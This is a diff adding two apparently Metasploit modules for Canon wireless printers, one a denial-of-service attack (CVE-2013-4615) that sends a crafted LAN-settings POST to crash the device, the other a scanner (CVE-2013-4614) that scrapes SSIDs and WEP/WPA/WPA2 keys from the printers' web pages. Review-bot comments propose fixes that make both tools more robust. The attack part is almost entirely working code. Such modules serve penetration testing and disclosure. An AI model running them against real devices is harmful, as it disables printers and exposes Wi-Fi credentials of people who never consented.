diff --git a/modules/auxiliary/dos/http/canon_wireless_printer.rb b/modules/auxiliary/dos/http/canon_wireless_printer.rb
new file mode 100644
index 0000000000..13fe138c53
--- /dev/null
+++ b/modules/auxiliary/dos/http/canon_wireless_printer.rb
@@ -0,0 +1,93 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Dos
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Canon Wireless Printer Denial Of Service',
+ 'Description' => %q{
+ The HTTP management interface on several models of Canon Wireless printers
+ allows for a Denial of Service condition via a crafted HTTP request. This
+ requires the device to be turned off and back on again to restore use.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Matt "hostess" Andreko '
+ ],
+ 'References' => [
+ [ 'CVE', '2013-4615' ],
+ [ 'URL', 'http://www.mattandreko.com/2013/06/canon-y-u-no-security.html']
+ ],
+ 'DisclosureDate' => 'Jun 18 2013'))
+ end
+
+ def is_alive?
+ res = send_request_raw({
+ 'method' => 'GET',
+ 'uri' => '/',
+ },10)
+
+ return !res.nil?
+ end
+
+ def run
+
+ begin
+
+ # The first request will set the new IP
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => '/English/pages_MacUS/cgi_lan.cgi',
+ 'data' => 'OK.x=61' +
+ '&OK.y=12' +
+ '&LAN_OPT1=2' +
+ '&LAN_TXT1=Wireless' +
+ '&LAN_OPT3=1' +
+ '&LAN_TXT21=192' +
+ '&LAN_TXT22=168' +
+ '&LAN_TXT23=1' +
+ '&LAN_TXT24=114">' +
+ '&LAN_TXT31=255' +
+ '&LAN_TXT32=255' +
+ '&LAN_TXT33=255' +
+ '&LAN_TXT34=0' +
+ '&LAN_TXT41=192' +
+ '&LAN_TXT42=168' +
+ '&LAN_TXT43=1' +
+ '&LAN_TXT44=1' +
+ '&LAN_OPT2=4' +
+ '&LAN_OPT4=1' +
+ '&LAN_HID1=1'
+ })
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+ print_error("Couldn't connect to #{rhost}:#{rport}")
+ return
+ end
+
+ # The second request will load the network options page, which seems to trigger the DoS
+ send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => '/English/pages_MacUS/lan_set_content.html'
+ },5) #default timeout, we don't care about the response
+
+ # Check to see if it worked or not
+ if is_alive?
+ print_error("#{rhost}:#{rport} - Server is still alive")
+ else
+ print_good("#{rhost}:#{rport} - Connection Refused: Success!")
+ end
+
+ end
+end
diff --git a/modules/auxiliary/scanner/http/canon_wireless.rb b/modules/auxiliary/scanner/http/canon_wireless.rb
new file mode 100644
index 0000000000..0e9b26b667
--- /dev/null
+++ b/modules/auxiliary/scanner/http/canon_wireless.rb
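Review bot: is_alive? issues its GET with no rescue, while the first request in run rescues `::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE`; as far as this hunk shows, a refused connection after the crash (the very state the print_good text describes) escapes is_alive? instead of being reported as "not alive", and the second send_request_cgi in run has the same gap. Adding `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE` followed by `false` just before the method's `end` makes the check return false on a refused or unreachable host. The `res` assigned from the first send_request_cgi is never read and can be dropped, and Ruby convention would name the predicate `alive?` rather than `is_alive?`. The Description should also say that the first request submits a static LAN configuration (192.168.1.114/24, gateway 192.168.1.1) alongside the crash trigger, a side effect the "turned off and back on again" sentence does not cover; whether that setting survives the power cycle is not established here.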
@@ -0,0 +1,149 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'nokogiri'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Auxiliary::Report
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Canon Printer Wireless Configuration Disclosure',
+ 'Description' => %q{
+ This module enumerates wireless credentials from Canon printers with a web interface.
+ It has been tested on Canon models: MG3100, MG5300, MG6100, MP495, MX340, MX870,
+ MX890, MX920.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Matt "hostess" Andreko '
+ ],
+ 'References' => [
+ [ 'CVE', '2013-4614' ],
+ [ 'URL', 'http://www.mattandreko.com/2013/06/canon-y-u-no-security.html']
+ ],
+ 'DisclosureDate' => 'Jun 18 2013'))
+ end
+
+ def get_network_settings
+ begin
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => '/English/pages_MacUS/lan_set_content.html',
+ })
+ rescue
+ print_error("#{rhost}:#{rport} Could not connect.")
+ return
+ end
+
+ if res
+ if res.code == 200
+
+ html = Nokogiri::HTML(res.body)
+
+ checked_lan_setting = html.xpath '//input[@name="LAN_OPT1" and @checked]'
+
+ if checked_lan_setting.count == 1
+ lan_setting = ''
+ ssid = ''
+ case checked_lan_setting[0]['value']
+ when '0'
+ lan_setting = 'Do not use LAN'
+ when '1'
+ lan_setting = 'Use wired LAN'
+ when '2'
+ lan_setting = 'Use wireless LAN'
+
+ ssid_input = html.xpath '//input[@name="LAN_TXT1"]'
+ ssid = ssid_input[0]['value'] if ssid_input.count == 1
+ end
+
+ return lan_setting, ssid
+ else
+ print_error("#{rhost}:#{rport} Could not determine LAN Settings.")
+ end
+
+ elsif res.code == 401
+ print_error("#{rhost}:#{rport} Authentication failed")
+ elsif res.code == 404
+ print_error("#{rhost}:#{rport} File not found")
+ end
+ end
+ end
+
+ def get_wireless_key
+ begin
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "/English/pages_MacUS/wls_set_content.html",
+ })
+ rescue
+ print_error("#{ip}:#{rport} Could not connect.")
+ return
+ end
+
+ if res
+ if res.code == 200
+ html = Nokogiri::HTML(res.body)
+ encryption_setting = ''
+ encryption_key = ''
+
+ checked_encryption_setting = html.xpath '//input[@name="WLS_OPT1" and @checked]'
+ case checked_encryption_setting[0]['value']
+ when '0'
+ encryption_setting = 'None'
+ when '1'
+ encryption_setting = 'WEP'
+ wep_key_inputs = html.xpath '//input[starts-with(@name, "WLS_TXT1") and not(@value="")]'
+ encryption_key = wep_key_inputs.collect{|x| x['value']}.join(', ')
+ when '2'
+ encryption_setting = 'WPA'
+ wpa_key_input = html.xpath '//input[@name="WLS_TXT2"]'
+ encryption_key = wpa_key_input[0]['value']
+ when '3'
+ encryption_setting = 'WPA2'
+ wpa2_key_input = html.xpath '//input[@name="WLS_TXT3"]'
+ encryption_key = wpa2_key_input[0]['value']
+ end
+
+ return encryption_setting, encryption_key
+
+ elsif res.code == 401
+ print_error("#{rhost}:#{rport} Authentication failed")
+ elsif res.code == 404
+ print_error("#{rhost}:#{rport} File not found")
+ end
+ end
+ end
+
+ def run_host(ip)
+
+ ns = get_network_settings
+ return if ns.nil?
+
+ good_string = "#{rhost}:#{rport} Option: #{ns[0]}"
+ if ns[0] == 'Use wireless LAN'
+ wireless_key = get_wireless_key
+ good_string += "\tSSID: #{ns[1]}\tEncryption Type: #{wireless_key[0]}\tKey: #{wireless_key[1]}"
+ end
+
+ report_note({
+ :data => good_string,
+ :type => 'canon.wireless',
+ :host => ip,
+ :port => rport
+ })
+
+ print_good good_string
+
+ end
+end
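Review bot: get_wireless_key indexes `checked_encryption_setting[0]['value']`, `wpa_key_input[0]['value']` and `wpa2_key_input[0]['value']` without the `count == 1` guard that get_network_settings applies, so a 200 response whose page lacks those inputs raises NoMethodError on nil instead of printing an error; the same happens in run_host, where `wireless_key[0]` is read even though get_wireless_key returns nil on a connection failure or a non-200 status. The rescue branch of get_wireless_key also interpolates `ip`, which is only a parameter of run_host (the sibling method uses `rhost`), so unless a mixin supplies an `ip` method the error path itself raises NameError. I would change that message to `print_error("#{rhost}:#{rport} Could not connect.")`, append `if wireless_key` to the `good_string +=` line in run_host, and guard the xpath results in get_wireless_key as below.
```ruby
checked_encryption_setting = html.xpath '//input[@name="WLS_OPT1" and @checked]'
if checked_encryption_setting.count != 1
  print_error("#{rhost}:#{rport} Could not determine encryption settings.")
  return
end
# … unchanged: case on checked_encryption_setting[0]['value'], when '0' and when '1' …
encryption_key = wpa_key_input[0]['value'] if wpa_key_input.count == 1
# … unchanged: when '3' branch up to the key lookup …
encryption_key = wpa2_key_input[0]['value'] if wpa2_key_input.count == 1
```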